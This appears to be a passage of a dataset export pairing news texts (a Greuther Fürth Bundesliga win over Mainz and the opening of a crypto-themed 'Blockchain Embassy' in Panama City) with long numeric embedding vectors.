0.05758567899465561,\n -0.01720191165804863,\n 0.06565432250499725,\n -0.03386141359806061,\n -0.09992632269859314,\n 0.06695003062486649,\n 0.040300868451595306,\n 0.04963643476366997,\n -0.09725736081600189,\n 0.03342427313327789,\n -0.060849629342556,\n -0.045929260551929474,\n -0.0291526447981596,\n -0.02304341085255146,\n 0.04373626410961151,\n -0.03907092660665512,\n -0.0696907639503479,\n -0.03783733397722244,\n 0.03461536392569542,\n -0.027488766238093376,\n -0.01059438195079565,\n 0.04223492741584778,\n 0.08880523592233658,\n 0.07669848948717117,\n 0.038278497755527496,\n -0.02054818719625473,\n 0.02697465941309929,\n -0.10444651544094086,\n 0.004986981861293316,\n 0.06085710600018501,\n 0.06085385009646416,\n -0.017052939161658287,\n -0.021040644496679306,\n 0.05986010655760765,\n 0.05530872568488121,\n -0.0036832888144999743,\n -0.061801716685295105,\n 0.055418699979782104,\n -0.02247014455497265,\n -0.000503294519148767,\n 0.08652947098016739,\n -0.01964566670358181,\n 0.049975261092185974,\n 0.01861427165567875,\n -0.04899166151881218,\n -0.08327767997980118,\n -0.016054607927799225,\n -0.03337784856557846,\n 0.05150831490755081,\n 0.02552170492708683,\n 0.0010788656072691083,\n -4.619483781142334e-33,\n -0.09331519156694412,\n -0.0070534260012209415,\n 0.03049320913851261,\n 0.006595270708203316,\n -0.06049300730228424,\n 0.009671913459897041,\n 0.03542627766728401,\n -0.08080253005027771,\n 0.024250080808997154,\n -0.06466742604970932,\n -0.10611343383789062,\n -0.02937231957912445,\n 0.12675295770168304,\n 0.001358867040835321,\n -0.021476777270436287,\n -0.0027564819902181625,\n 0.05900115147233009,\n -0.10425285249948502,\n -0.003096431028097868,\n -0.01780029758810997,\n -0.021704010665416718,\n 0.0668322890996933,\n 0.045693740248680115,\n 0.05340533331036568,\n 0.060835763812065125,\n -0.005198396742343903,\n -0.09128733724355698,\n 0.010145781561732292,\n 0.030954884365200996,\n -0.027467111125588417,\n -0.03325260803103447,\n -0.051425449550151825,\n -0.043889120221138,\n -0.012365888804197311,\n -0.02350621111690998,\n -0.01974458061158657,\n 0.021091898903250694,\n -0.03669296205043793,\n -0.0499923937022686,\n 0.07127311080694199,\n 0.058487098664045334,\n -0.04699736833572388,\n 0.015725521370768547,\n 0.023225456476211548,\n -0.018781866878271103,\n -0.013900479301810265,\n 0.01546924002468586,\n -0.06778214871883392,\n -0.005719227250665426,\n -0.02545933611690998,\n 0.006213585380464792,\n 0.04099034518003464,\n -0.11160651594400406,\n 0.05669047310948372,\n 0.015806764364242554,\n 0.0025485639926046133,\n -0.0018470027716830373,\n 0.03613679111003876,\n -0.1405763328075409,\n 0.011997333727777004,\n -0.014247670769691467,\n 0.08180851489305496,\n -0.07528449594974518,\n 0.03502911329269409,\n 0.01694159209728241,\n -0.08491650223731995,\n 0.03515169769525528,\n -0.15830954909324646,\n 0.009424944408237934,\n -0.07908269762992859,\n 0.006799738854169846,\n -0.035328835248947144,\n -0.041981104761362076,\n 0.038461387157440186,\n -0.10420259833335876,\n -0.017562013119459152,\n -0.0088794631883502,\n 0.034634191542863846,\n -0.0300820991396904,\n 0.023450817912817,\n -0.039408985525369644,\n -0.0019456581212580204,\n -0.054121069610118866,\n -0.016328779980540276,\n 0.02656913921236992,\n 0.005427177995443344,\n -0.04333554580807686,\n -0.10011330991983414,\n -0.012565524317324162,\n 0.07163707166910172,\n -0.11632488667964935,\n 0.04412633553147316,\n -0.10056707262992859,\n -0.012991014868021011,\n 0.03584301844239235,\n -5.462618091200966e-8,\n 0.1578119397163391,\n 0.08608002960681915,\n -0.015988240018486977,\n 0.002663110848516226,\n 0.08371765911579132,\n -0.030200647190213203,\n -0.012018095701932907,\n 0.08298780024051666,\n 0.016450146213173866,\n 0.037072811275720596,\n 0.06675666570663452,\n 0.005141387693583965,\n 0.011966004967689514,\n 0.014865562319755554,\n -0.08733643591403961,\n 0.037277959287166595,\n -0.019029762595891953,\n 0.02250937931239605,\n -0.0590391643345356,\n -0.08212890475988388,\n 0.012846134603023529,\n 0.0012687243288382888,\n -0.03958570957183838,\n 0.06060517579317093,\n -0.02501239813864231,\n -0.00041651498759165406,\n -0.03326534107327461,\n 0.05217009782791138,\n 0.0055720009841024876,\n -0.001151585252955556,\n -0.040438562631607056,\n -0.059942614287137985,\n -0.03227528929710388,\n -0.055547211319208145,\n 0.03104523755609989,\n -0.016031477600336075,\n 0.018860630691051483,\n -0.03993814066052437,\n 0.037565845996141434,\n 0.0680924504995346,\n 0.07361295819282532,\n -0.024647196754813194,\n -0.07813792675733566,\n 0.0030967958737164736,\n -0.05944373086094856,\n -0.07847662270069122,\n -0.10847090184688568,\n -0.015039355494081974,\n 0.01321864128112793,\n -0.0014022665563970804,\n 0.006690610200166702,\n -0.008802696131169796,\n -0.088969886302948,\n 0.10581537336111069,\n 0.04515751451253891,\n -0.06927891820669174,\n -0.039920054376125336,\n -0.06674444675445557,\n 0.009802632965147495,\n 0.04624378681182861,\n 0.0010129096917808056,\n -0.0016703647561371326,\n -0.040734704583883286,\n 0.027327274903655052\n]"}}},{"rowIdx":1290,"cells":{"text":{"kind":"string","value":"Greutner Fürth got their first taste of Bundesliga victory on Friday when Felix Klaus led his newly promoted team to a 1-0 away victory in the 67th minute.\n\nAfter being teed up by Illir Azemi, Klaus scored the only goal of the match when his dipping left-foot strike went straight over Christian Wetklo. Like several of his team mates, Klaus had never played in the top division before this season.\n\nMainz had dominated throughout the match, but failed to make use of their chances. Maxim Choupo-Moting was the main culprit for Mainz, missing several good opportunities.\n\nAfter going a goal down, Mainz coach Thomas Tuchel brought on Marcel Risse and Eugen Polanski in an attempt to snatch a draw, but the home side could not turn things around.\n\nUp until their debut Bundesliga game at home last week, when they lost 3-0 to Bayern Munich, Fürth had not taken part in top flight football since they participated in the last edition of the old German first division in 1962/1963. The following season they were not among the 16 clubs chosen to take part in the inaugural Bundesliga and were unable to recover.\n\nFriday's performance and a first-match draw in Freiburg have left Mainz with one point from two games. Defending champions Borussia Dortmund play Nuremberg on Saturday, while Bayern Munich are defending their Bundesliga lead at home against VfB Stuttgart on Sunday."},"embedding":{"kind":"list like","value":[0.018741877749562263,0.03243456780910492,-0.008274166844785213,-0.02037440985441208,0.049517955631017685,0.032950691878795624,0.04320792853832245,0.12493161857128143,0.028347771614789963,-0.02127382531762123,-0.0007644943543709815,-0.001979720313102007,-0.017324702814221382,0.07864537835121155,0.02714059315621853,-0.09676121175289154,-0.06350824981927872,-0.037004828453063965,-0.030109478160738945,0.018673498183488846,-0.011563570238649845,-0.060118794441223145,-0.046248048543930054,-0.03863974288105965,0.0730956494808197,-0.1076926738023758,0.0345202200114727,-0.09152722358703613,0.002850734628736973,-0.05444872006773949,0.060780514031648636,-0.03520938754081726,0.0254739448428154,-0.04648048058152199,-0.025904223322868347,0.025104422122240067,0.03899485245347023,-0.059386271983385086,-0.017039725556969643,0.02515850029885769,-0.059986408799886703,0.017698129639029503,-0.04743952676653862,0.04052044078707695,-0.057447969913482666,0.015147932805120945,0.08315949887037277,0.036855388432741165,-0.0721178874373436,0.02937752567231655,0.006073767319321632,0.005963445175439119,0.04992116615176201,0.03364954888820648,-0.012153849005699158,0.12168703973293304,-0.045454204082489014,-0.01257612369954586,-0.015058712102472782,-0.0711050033569336,-0.016515837982296944,-0.041492972522974014,-0.005834632087498903,-0.048096735030412674,-0.11006702482700348,-0.0932164341211319,0.035250984132289886,-0.048215143382549286,-0.010851878672838211,0.1076972484588623,0.052652571350336075,-0.08196811378002167,0.024332774803042412,-0.03879249840974808,0.0701410174369812,0.06970268487930298,-0.06610260903835297,0.02362801507115364,0.04943976551294327,-0.022206014022231102,-0.02206961251795292,-0.057916849851608276,-0.041350916028022766,0.09267064183950424,0.002561772707849741,0.006561078131198883,0.03494725376367569,0.016395943239331245,0.040500953793525696,-0.07010100036859512,-0.014371608383953571,-0.016369620338082314,0.02731981687247753,-0.012753318063914776,0.011532564647495747,0.02625397779047489,-0.008031968027353287,0.06765010952949524,0.07651828974485397,0.04809447377920151,-0.023381248116493225,0.04789259657263756,-0.033911388367414474,0.024163909256458282,0.016515973955392838,0.03704312816262245,0.04507237300276756,0.040787696838378906,0.011090262793004513,-0.01682962290942669,-0.025470135733485222,0.03530742973089218,0.08808909356594086,0.013770153746008873,-0.026923930272459984,-0.006555613130331039,0.04329395666718483,-0.005513899493962526,0.0051607112400233746,0.06512747704982758,0.038624733686447144,0.07992663979530334,-0.05176819488406181,0.08654990792274475,-0.01045164279639721,0.11281859874725342,0.12445319443941116,5.2419359578935676e-33,0.030282892286777496,-0.0755428820848465,-0.06970163434743881,-0.030256114900112152,0.01681659184396267,0.04046284034848213,-0.025087492540478706,-0.0696524977684021,-0.05208431929349899,-0.025231601670384407,-0.07881971448659897,-0.06076276674866676,0.011050596833229065,-0.0776224359869957,0.009692346677184105,0.08505082875490189,0.01886104606091976,-0.017234520986676216,0.009193159639835358,0.03926866874098778,0.07129183411598206,-0.017161648720502853,-0.012877299450337887,-0.014570558443665504,0.05576266720890999,0.12856042385101318,-0.04307373985648155,-0.08086219429969788,-0.04040084779262543,-0.03664427995681763,0.07196130603551865,-0.05756030231714249,-0.047432515770196915,0.037482041865587234,-0.05457722395658493,0.07755254954099655,-0.03089367039501667,0.02164650894701481,-0.009947439655661583,-0.04630374535918236,-0.05749748274683952,0.03356907516717911,-0.03482597693800926,-0.09512849897146225,-0.021435489878058434,-0.045522548258304596,-0.11554758250713348,0.018109630793333054,-0.021257054060697556,-0.09592568874359131,0.010844267904758453,0.024322746321558952,0.07971788942813873,0.04335377737879753,-0.003085225122049451,0.038892921060323715,0.08539780974388123,0.007046808488667011,-0.001215637312270701,0.02115112543106079,-0.006580996792763472,-0.0008215052075684071,-0.017701219767332077,0.02275526523590088,-0.003145771101117134,-0.0525364987552166,0.043131329119205475,0.03895093500614166,-0.06734704226255417,-0.04015780985355377,-0.07980021834373474,-0.015131071209907532,-0.016374723985791206,-0.04834697023034096,0.02788769267499447,-0.05348873883485794,-0.0448288731276989,-0.044505100697278976,-0.018222130835056305,-0.014723830856382847,0.053199782967567444,-0.0569932796061039,0.017525115981698036,-0.07999320328235626,-0.0033636330626904964,-0.020143212750554085,-0.027033384889364243,0.03694015368819237,-0.03904189541935921,0.10124616324901581,-0.011346590705215931,0.036087766289711,0.03007837012410164,0.030778974294662476,-0.03737093508243561,-5.17566342310413e-33,-0.04713432863354683,-0.001756722223944962,-0.008974199183285236,-0.036607395857572556,-0.03177822008728981,0.14905226230621338,-0.007494217716157436,0.009558545425534248,-0.054124053567647934,-0.024198533967137337,0.10345541685819626,-0.028563497588038445,-0.10896728187799454,0.033484067767858505,-0.08528857678174973,0.04178436100482941,0.007305533159524202,0.01930556818842888,0.044245317578315735,-0.02930549345910549,0.057576388120651245,0.007550578564405441,-0.11487448960542679,0.02887452207505703,-0.0003411570214666426,0.054002922028303146,0.07023807615041733,0.08725658059120178,-0.06716537475585938,-0.021115027368068695,0.021149450913071632,-0.06503836810588837,0.05937561020255089,-0.051003750413656235,0.03854072093963623,0.0662318766117096,-0.0539356991648674,0.13220000267028809,0.002940036589279771,0.07784873992204666,0.04456429183483124,0.0345100499689579,0.01516733318567276,0.08234857767820358,0.028140993788838387,-0.014992184937000275,-0.005842460785061121,-0.07145582884550095,-0.04191063717007637,0.017191912978887558,-0.02185448445379734,-0.04433729499578476,-0.032911092042922974,0.05473921447992325,0.033859558403491974,-0.012791525572538376,-0.05002528801560402,-0.02532762847840786,-0.028030501678586006,-0.0036376002244651318,-0.005079860333353281,0.06188447028398514,-0.07642003148794174,0.0851411297917366,0.009318085387349129,0.015814388170838356,-0.14553150534629822,-0.014793718233704567,-0.04431498050689697,-0.002487538382411003,-0.09956295043230057,0.10351237654685974,0.060295119881629944,0.006427072454243898,0.029622958973050117,0.0748135969042778,-0.10380139201879501,0.07262473553419113,-0.015685752034187317,-0.007698122877627611,-0.04219291731715202,-0.017054205760359764,-0.08277609199285507,0.08313297480344772,0.06584511697292328,-0.01177128590643406,0.024222996085882187,0.040975309908390045,0.07112087309360504,-0.026726134121418,0.0031722194980829954,-0.004276883788406849,0.037417955696582794,0.02990429848432541,0.13201841711997986,-5.59783153164517e-8,-0.009351748041808605,-0.013457529246807098,-0.12030009180307388,0.04254528880119324,-0.01059420220553875,-0.00825803168118,-0.0349278599023819,-0.041575491428375244,-0.10667277872562408,-0.010290322825312614,-0.03228894993662834,0.051898807287216187,-0.006861419416964054,-0.02545345574617386,0.05565961077809334,0.05408654361963272,0.008294297382235527,-0.04942825809121132,0.02183711901307106,0.03610881417989731,-0.023907342925667763,0.03275622799992561,-0.07738207280635834,0.05605417117476463,0.05085556209087372,-0.002749210223555565,-0.03823826462030411,0.022721964865922928,-0.062103625386953354,-0.03053673356771469,0.017089614644646645,0.029984354972839355,0.03265974298119545,0.016644064337015152,0.016801299527287483,0.07277964055538177,-0.014783911406993866,-0.053633756935596466,0.05913292616605759,-0.035271015018224716,-0.03702091798186302,0.047505300492048264,-0.021593870595097542,-0.035175472497940063,0.004553721286356449,-0.03410201892256737,-0.04423120990395546,-0.07393400371074677,0.030972357839345932,-0.004602702334523201,-0.030031098052859306,0.0294182151556015,0.018924085423350334,0.07485124468803406,-0.009609908796846867,-0.03044208325445652,-0.060342784970998764,-0.04868445172905922,-0.07610205560922623,0.0077904025092720985,0.02370234951376915,-0.059690605849027634,-0.02877908945083618,0.01432146318256855],"string":"[\n 0.018741877749562263,\n 0.03243456780910492,\n -0.008274166844785213,\n -0.02037440985441208,\n 0.049517955631017685,\n 0.032950691878795624,\n 0.04320792853832245,\n 0.12493161857128143,\n 0.028347771614789963,\n -0.02127382531762123,\n -0.0007644943543709815,\n -0.001979720313102007,\n -0.017324702814221382,\n 0.07864537835121155,\n 0.02714059315621853,\n -0.09676121175289154,\n -0.06350824981927872,\n -0.037004828453063965,\n -0.030109478160738945,\n 0.018673498183488846,\n -0.011563570238649845,\n -0.060118794441223145,\n -0.046248048543930054,\n -0.03863974288105965,\n 0.0730956494808197,\n -0.1076926738023758,\n 0.0345202200114727,\n -0.09152722358703613,\n 0.002850734628736973,\n -0.05444872006773949,\n 0.060780514031648636,\n -0.03520938754081726,\n 0.0254739448428154,\n -0.04648048058152199,\n -0.025904223322868347,\n 0.025104422122240067,\n 0.03899485245347023,\n -0.059386271983385086,\n -0.017039725556969643,\n 0.02515850029885769,\n -0.059986408799886703,\n 0.017698129639029503,\n -0.04743952676653862,\n 0.04052044078707695,\n -0.057447969913482666,\n 0.015147932805120945,\n 0.08315949887037277,\n 0.036855388432741165,\n -0.0721178874373436,\n 0.02937752567231655,\n 0.006073767319321632,\n 0.005963445175439119,\n 0.04992116615176201,\n 0.03364954888820648,\n -0.012153849005699158,\n 0.12168703973293304,\n -0.045454204082489014,\n -0.01257612369954586,\n -0.015058712102472782,\n -0.0711050033569336,\n -0.016515837982296944,\n -0.041492972522974014,\n -0.005834632087498903,\n -0.048096735030412674,\n -0.11006702482700348,\n -0.0932164341211319,\n 0.035250984132289886,\n -0.048215143382549286,\n -0.010851878672838211,\n 0.1076972484588623,\n 0.052652571350336075,\n -0.08196811378002167,\n 0.024332774803042412,\n -0.03879249840974808,\n 0.0701410174369812,\n 0.06970268487930298,\n -0.06610260903835297,\n 0.02362801507115364,\n 0.04943976551294327,\n -0.022206014022231102,\n -0.02206961251795292,\n -0.057916849851608276,\n -0.041350916028022766,\n 0.09267064183950424,\n 0.002561772707849741,\n 0.006561078131198883,\n 0.03494725376367569,\n 0.016395943239331245,\n 0.040500953793525696,\n -0.07010100036859512,\n -0.014371608383953571,\n -0.016369620338082314,\n 0.02731981687247753,\n -0.012753318063914776,\n 0.011532564647495747,\n 0.02625397779047489,\n -0.008031968027353287,\n 0.06765010952949524,\n 0.07651828974485397,\n 0.04809447377920151,\n -0.023381248116493225,\n 0.04789259657263756,\n -0.033911388367414474,\n 0.024163909256458282,\n 0.016515973955392838,\n 0.03704312816262245,\n 0.04507237300276756,\n 0.040787696838378906,\n 0.011090262793004513,\n -0.01682962290942669,\n -0.025470135733485222,\n 0.03530742973089218,\n 0.08808909356594086,\n 0.013770153746008873,\n -0.026923930272459984,\n -0.006555613130331039,\n 0.04329395666718483,\n -0.005513899493962526,\n 0.0051607112400233746,\n 0.06512747704982758,\n 0.038624733686447144,\n 0.07992663979530334,\n -0.05176819488406181,\n 0.08654990792274475,\n -0.01045164279639721,\n 0.11281859874725342,\n 0.12445319443941116,\n 5.2419359578935676e-33,\n 0.030282892286777496,\n -0.0755428820848465,\n -0.06970163434743881,\n -0.030256114900112152,\n 0.01681659184396267,\n 0.04046284034848213,\n -0.025087492540478706,\n -0.0696524977684021,\n -0.05208431929349899,\n -0.025231601670384407,\n -0.07881971448659897,\n -0.06076276674866676,\n 0.011050596833229065,\n -0.0776224359869957,\n 0.009692346677184105,\n 0.08505082875490189,\n 0.01886104606091976,\n -0.017234520986676216,\n 0.009193159639835358,\n 0.03926866874098778,\n 0.07129183411598206,\n -0.017161648720502853,\n -0.012877299450337887,\n -0.014570558443665504,\n 0.05576266720890999,\n 0.12856042385101318,\n -0.04307373985648155,\n -0.08086219429969788,\n -0.04040084779262543,\n -0.03664427995681763,\n 0.07196130603551865,\n -0.05756030231714249,\n -0.047432515770196915,\n 0.037482041865587234,\n -0.05457722395658493,\n 0.07755254954099655,\n -0.03089367039501667,\n 0.02164650894701481,\n -0.009947439655661583,\n -0.04630374535918236,\n -0.05749748274683952,\n 0.03356907516717911,\n -0.03482597693800926,\n -0.09512849897146225,\n -0.021435489878058434,\n -0.045522548258304596,\n -0.11554758250713348,\n 0.018109630793333054,\n -0.021257054060697556,\n -0.09592568874359131,\n 0.010844267904758453,\n 0.024322746321558952,\n 0.07971788942813873,\n 0.04335377737879753,\n -0.003085225122049451,\n 0.038892921060323715,\n 0.08539780974388123,\n 0.007046808488667011,\n -0.001215637312270701,\n 0.02115112543106079,\n -0.006580996792763472,\n -0.0008215052075684071,\n -0.017701219767332077,\n 0.02275526523590088,\n -0.003145771101117134,\n -0.0525364987552166,\n 0.043131329119205475,\n 0.03895093500614166,\n -0.06734704226255417,\n -0.04015780985355377,\n -0.07980021834373474,\n -0.015131071209907532,\n -0.016374723985791206,\n -0.04834697023034096,\n 0.02788769267499447,\n -0.05348873883485794,\n -0.0448288731276989,\n -0.044505100697278976,\n -0.018222130835056305,\n -0.014723830856382847,\n 0.053199782967567444,\n -0.0569932796061039,\n 0.017525115981698036,\n -0.07999320328235626,\n -0.0033636330626904964,\n -0.020143212750554085,\n -0.027033384889364243,\n 0.03694015368819237,\n -0.03904189541935921,\n 0.10124616324901581,\n -0.011346590705215931,\n 0.036087766289711,\n 0.03007837012410164,\n 0.030778974294662476,\n -0.03737093508243561,\n -5.17566342310413e-33,\n -0.04713432863354683,\n -0.001756722223944962,\n -0.008974199183285236,\n -0.036607395857572556,\n -0.03177822008728981,\n 0.14905226230621338,\n -0.007494217716157436,\n 0.009558545425534248,\n -0.054124053567647934,\n -0.024198533967137337,\n 0.10345541685819626,\n -0.028563497588038445,\n -0.10896728187799454,\n 0.033484067767858505,\n -0.08528857678174973,\n 0.04178436100482941,\n 0.007305533159524202,\n 0.01930556818842888,\n 0.044245317578315735,\n -0.02930549345910549,\n 0.057576388120651245,\n 0.007550578564405441,\n -0.11487448960542679,\n 0.02887452207505703,\n -0.0003411570214666426,\n 0.054002922028303146,\n 0.07023807615041733,\n 0.08725658059120178,\n -0.06716537475585938,\n -0.021115027368068695,\n 0.021149450913071632,\n -0.06503836810588837,\n 0.05937561020255089,\n -0.051003750413656235,\n 0.03854072093963623,\n 0.0662318766117096,\n -0.0539356991648674,\n 0.13220000267028809,\n 0.002940036589279771,\n 0.07784873992204666,\n 0.04456429183483124,\n 0.0345100499689579,\n 0.01516733318567276,\n 0.08234857767820358,\n 0.028140993788838387,\n -0.014992184937000275,\n -0.005842460785061121,\n -0.07145582884550095,\n -0.04191063717007637,\n 0.017191912978887558,\n -0.02185448445379734,\n -0.04433729499578476,\n -0.032911092042922974,\n 0.05473921447992325,\n 0.033859558403491974,\n -0.012791525572538376,\n -0.05002528801560402,\n -0.02532762847840786,\n -0.028030501678586006,\n -0.0036376002244651318,\n -0.005079860333353281,\n 0.06188447028398514,\n -0.07642003148794174,\n 0.0851411297917366,\n 0.009318085387349129,\n 0.015814388170838356,\n -0.14553150534629822,\n -0.014793718233704567,\n -0.04431498050689697,\n -0.002487538382411003,\n -0.09956295043230057,\n 0.10351237654685974,\n 0.060295119881629944,\n 0.006427072454243898,\n 0.029622958973050117,\n 0.0748135969042778,\n -0.10380139201879501,\n 0.07262473553419113,\n -0.015685752034187317,\n -0.007698122877627611,\n -0.04219291731715202,\n -0.017054205760359764,\n -0.08277609199285507,\n 0.08313297480344772,\n 0.06584511697292328,\n -0.01177128590643406,\n 0.024222996085882187,\n 0.040975309908390045,\n 0.07112087309360504,\n -0.026726134121418,\n 0.0031722194980829954,\n -0.004276883788406849,\n 0.037417955696582794,\n 0.02990429848432541,\n 0.13201841711997986,\n -5.59783153164517e-8,\n -0.009351748041808605,\n -0.013457529246807098,\n -0.12030009180307388,\n 0.04254528880119324,\n -0.01059420220553875,\n -0.00825803168118,\n -0.0349278599023819,\n -0.041575491428375244,\n -0.10667277872562408,\n -0.010290322825312614,\n -0.03228894993662834,\n 0.051898807287216187,\n -0.006861419416964054,\n -0.02545345574617386,\n 0.05565961077809334,\n 0.05408654361963272,\n 0.008294297382235527,\n -0.04942825809121132,\n 0.02183711901307106,\n 0.03610881417989731,\n -0.023907342925667763,\n 0.03275622799992561,\n -0.07738207280635834,\n 0.05605417117476463,\n 0.05085556209087372,\n -0.002749210223555565,\n -0.03823826462030411,\n 0.022721964865922928,\n -0.062103625386953354,\n -0.03053673356771469,\n 0.017089614644646645,\n 0.029984354972839355,\n 0.03265974298119545,\n 0.016644064337015152,\n 0.016801299527287483,\n 0.07277964055538177,\n -0.014783911406993866,\n -0.053633756935596466,\n 0.05913292616605759,\n -0.035271015018224716,\n -0.03702091798186302,\n 0.047505300492048264,\n -0.021593870595097542,\n -0.035175472497940063,\n 0.004553721286356449,\n -0.03410201892256737,\n -0.04423120990395546,\n -0.07393400371074677,\n 0.030972357839345932,\n -0.004602702334523201,\n -0.030031098052859306,\n 0.0294182151556015,\n 0.018924085423350334,\n 0.07485124468803406,\n -0.009609908796846867,\n -0.03044208325445652,\n -0.060342784970998764,\n -0.04868445172905922,\n -0.07610205560922623,\n 0.0077904025092720985,\n 0.02370234951376915,\n -0.059690605849027634,\n -0.02877908945083618,\n 0.01432146318256855\n]"}}},{"rowIdx":1291,"cells":{"text":{"kind":"string","value":"Blockchain Embassy Opens for Business in Panama City\n\nA new location for bitcoin and cryptocurrency enthusiasts, entrepreneurs, activists, iconoclasts, connoisseurs, and the general public has opened in Panama. It is called the Blockchain Embassy. It is located in the Balboa Boutiques Strip Mall of Balboa Avenue in Panama City.\n\nAlso read: ICO Regulatory Round-Up: UK, Malaysia, and Switzerland’s Crypto Valley Point to Risks\n\nInformation on the Blockchain Embassy\n\nThe space has crypto clothing and other merchandise for sale. It has a cafeteria, craft beers for sale, hardware wallets on display, a coffee shop, and even a working space.\n\nA press release sent to bitcoin.com, said the embassy will also start giving cryptocurrency workshops and presentations. Everyone is welcome to come and engage with the Panama crypto community. The Embassy press release elaborated on how it accepts payment and provided more information:\n\nThe embassy accepts payments in cash and Crypto, and has become an emblematic tourist site in Panama. It receives visitors from all over the world. It is one of the projects created by startup Cryptobuyer.io, known for being the first company in the world to install ATMs in commercial banks, as well as integrating its system Cryptobuyer Pay that allows any commerce to accept payments in Bitcoin and other currencies.\n\nMotivations to Build the Blockchain Embassy in Panama\n\nBitcoin.com reached out to one of the founders of the Blockchain Embassy (and Cryptobuyer), Jorge Farias, to get some insight on the motivations behind setting up the embassy.\n\nHe said, “We created the embassy because we were motivated by the need to educate the people not only of Panama, but also of the world. Panama is a tourist site, and at the same time, a major financial and logistic center. We believe that it is an ideal place to show the power of technology in a real, palpable way.”\n\nFurthermore, he said his company chose the site in Panama City because it is easy to access by car and it allowed his team to integrate all of its amenities. He said besides offering the Crypto ATM, hardware wallets, and all the amenities mentioned, they plan on gradually adding many more things for their customer’s enjoyment.\n\nWhat do you think about the Blockchain Embassy? Will you visit it? Let us know in the comments section below.\n\nImages courtesy of Blockchain Embassy\n\nAt Bitcoin.com there’s a bunch of free helpful services. For instance, have you seen our Tools page? You can even lookup the exchange rate for a transaction in the past. Or calculate the value of your current holdings. Or create a paper wallet. And much more."},"embedding":{"kind":"list like","value":[-0.04815385863184929,0.0081796171143651,-0.07384995371103287,-0.01602235622704029,0.05200835317373276,-0.11400347948074341,0.0030773652251809835,0.0035183788277208805,0.053732696920633316,-0.01388718280941248,0.024839291349053383,-0.05916411802172661,0.009829927235841751,0.05518068000674248,0.08338101208209991,-0.00932314619421959,0.01529205683618784,-0.006404287181794643,-0.002189605263993144,0.001154691562987864,0.05585740506649017,-0.08259224891662598,0.02468634396791458,-0.0030398762319236994,-0.08300550282001495,0.012453948147594929,0.014984596520662308,-0.01637493073940277,-0.06289535760879517,0.02832142636179924,0.010301110334694386,0.0538211315870285,0.02870313823223114,0.027711171656847,0.05916663259267807,0.0948302298784256,0.08999545872211456,-0.06582386046648026,0.051433611661195755,-0.025026999413967133,0.030100395902991295,-0.05044375732541084,0.0883588120341301,-0.05987473577260971,-0.007774820551276207,-0.06779374182224274,0.11675628274679184,0.027479322627186775,-0.0019851126708090305,-0.016266120597720146,0.10241340845823288,-0.01525089144706726,0.0019365192856639624,0.026016628369688988,-0.09953124821186066,0.036319758743047714,-0.03857443109154701,-0.07206594944000244,-0.0036821565590798855,-0.06617697328329086,0.07007279992103577,0.04417023807764053,-0.019154159352183342,0.07136137038469315,0.030421016737818718,0.05327935144305229,0.0323023721575737,0.05695314705371857,-0.005405745003372431,-0.1197691410779953,0.05464993417263031,-0.11003746837377548,-0.036794841289520264,0.11782190948724747,0.012580986134707928,-0.06875558942556381,0.061540111899375916,0.025748221203684807,-0.03506728261709213,-0.044920627027750015,0.024407727643847466,-0.010198386386036873,0.005710021127015352,-0.017431369051337242,-0.041438013315200806,0.03309373930096626,-0.010515849106013775,0.031279344111680984,0.018414167687296867,0.06125457584857941,0.06398309022188187,0.04827241227030754,-0.03592679649591446,-0.04932601749897003,0.0115267438814044,-0.037461861968040466,0.060466405004262924,0.07007535547018051,-0.025630688294768333,0.045986950397491455,0.08140826225280762,0.007243601139634848,0.012339657172560692,-0.058450277894735336,0.047696880996227264,0.0642663761973381,-0.0360138863325119,0.0013570780865848064,0.038970135152339935,0.09036779403686523,-0.10168566554784775,0.01393144391477108,-0.037434305995702744,-0.025301575660705566,-0.03077705018222332,0.08448465913534164,-0.035867463797330856,0.01416024100035429,-0.03180302307009697,0.05993751436471939,0.032858818769454956,0.004801081959158182,-0.004912782460451126,-0.09680961072444916,-0.06090546399354935,-0.017201989889144897,0.0007375218556262553,7.430764479158239e-34,-0.0739530399441719,0.013655660673975945,0.07711495459079742,-0.0036697490140795708,0.04524354264140129,0.027557268738746643,0.008859650231897831,0.049620725214481354,-0.06268971413373947,0.02602684497833252,-0.06526381522417068,-0.07305381447076797,0.04415453225374222,0.046112414449453354,-0.016132889315485954,-0.0029320688918232918,-0.035852979868650436,-0.07020915299654007,0.041835661977529526,0.018860487267374992,0.014707543887197971,-0.013413929380476475,0.0636155903339386,0.0037493447307497263,0.06269121170043945,0.08591149002313614,-0.008483469486236572,-0.007510318420827389,0.0699029490351677,0.041773125529289246,-0.03227398917078972,0.021716265007853508,0.024865353479981422,-0.06623712927103043,-0.010756619274616241,0.03933224827051163,0.05856770649552345,-0.05472484603524208,-0.013686755672097206,-0.04249342530965805,0.0018614382715895772,-0.008603855967521667,-0.049452997744083405,0.07468333095312119,0.013019957579672337,0.07445433735847473,0.05335601046681404,-0.012577056884765625,0.06522738188505173,0.06688915193080902,0.0077355061657726765,-0.021028444170951843,-0.12608908116817474,-0.03875770792365074,0.018186816945672035,-0.09384002536535263,-0.049799662083387375,-0.008591427467763424,-0.0006180249038152397,-0.01774422451853752,0.036284737288951874,-0.0108942287042737,-0.08787178248167038,0.029235944151878357,-0.049531612545251846,0.040346335619688034,-0.014817989431321621,-0.010235403664410114,0.002222867915406823,-0.033008869737386703,-0.046378906816244125,-0.016896100714802742,0.009266462177038193,0.11875591427087784,0.007894421927630901,0.08109277486801147,-0.02804177813231945,0.06192384287714958,0.01190448459237814,0.0276792049407959,-0.02966274879872799,0.036078691482543945,0.12253308296203613,0.029457177966833115,-0.04484173655509949,0.09901934862136841,0.05723213776946068,-0.02369360439479351,-0.007286992855370045,-0.07172296941280365,0.02819620817899704,0.005137439351528883,0.03350719437003136,0.001180238206870854,0.012313087470829487,-2.5767569017283883e-33,0.008281036280095577,-0.13785187900066376,-0.0210171677172184,-0.050201836973428726,-0.02851242572069168,-0.01516417320817709,-0.0625198483467102,0.025897903367877007,0.020839091390371323,0.009102871641516685,-0.013978643342852592,-0.06937554478645325,0.11998855322599411,0.017026256769895554,0.08670885860919952,-0.013066237792372704,0.04103280231356621,0.030486637726426125,-0.00095826864708215,0.06373560428619385,0.0201466903090477,0.0036523714661598206,-0.022809434682130814,-0.038844723254442215,-0.036188188940286636,-0.03391522541642189,-0.06330014020204544,-0.05751582607626915,0.1358945071697235,-0.006592986639589071,-0.05468178540468216,0.024760598316788673,-0.06000928208231926,0.03158159554004669,-0.0704987421631813,0.007785772439092398,-0.06725451350212097,-0.03950079530477524,0.033086299896240234,-0.0057573444209992886,0.0026201384607702494,-0.0029504026751965284,-0.07526751607656479,0.012238810770213604,-0.09951676428318024,-0.054387111216783524,-0.05165998265147209,-0.0014791962457820773,-